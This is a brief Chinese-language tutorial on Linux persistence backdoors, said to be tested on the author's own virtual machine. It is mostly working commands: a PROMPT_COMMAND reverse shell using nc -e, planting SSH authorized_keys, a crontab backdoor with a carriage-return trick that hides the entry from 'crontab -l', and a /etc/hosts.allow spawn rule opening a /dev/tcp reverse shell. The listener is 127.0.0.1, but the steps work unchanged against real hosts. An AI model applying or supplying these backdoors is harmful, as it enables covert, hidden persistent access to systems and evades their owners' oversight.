Linux权限维持

以下仅在自己虚拟机上进行测试

PROMPT_COMMAND

先在ubuntu自身监听6666端口

nc –lvvp 6666

然后在ubuntu上执行下列命令：

export PROMPT_COMMAND=”nc -e /bin/bash 127.0.0.1 6666 &”

此时nc已经获取到权限

SSH 公钥免密登陆

在ubuntu上生成公钥，命令：

ssh-keygen -t rsa

公钥生成目录：/root/.ssh/id_rsa.pub

将该目录下的公钥放到kali的/root/.ssh目录下，并改名为authorized_keys

在ubuntu上使用SSH登录kali，可直接免密登录

Crontab后门

在ubuntu上执行下列命令：

(crontab -l;echo ‘*/1 * * * * /bin/bash /tmp/1.elf;/bin/bash –noprofile -i’)|crontab –

查看crontab

crontab –l

在ubuntu上执行下列命令:

(crontab -l;printf “*/1 * * * * /bin/bash /tmp/1.elf;/bin/bash –noprofile -i;\rno crontab for `whoami`%100c\n”)|crontab –

查看crontab

crontab –l

使用特权用户查看

less /var/spool/cron/crontabs/用户名

TCP Wrappers

在ubuntu上修改/etc/hosts.allow文件

在后面追加：

ALL: ALL: spawn (bash -c “/bin/bash -i >& /dev/tcp/127.0.0.1/6666 0>&1”) & :allow

保存

在本地监听6666端口，然后使用SSH连接本地，本地6666就可以获得shell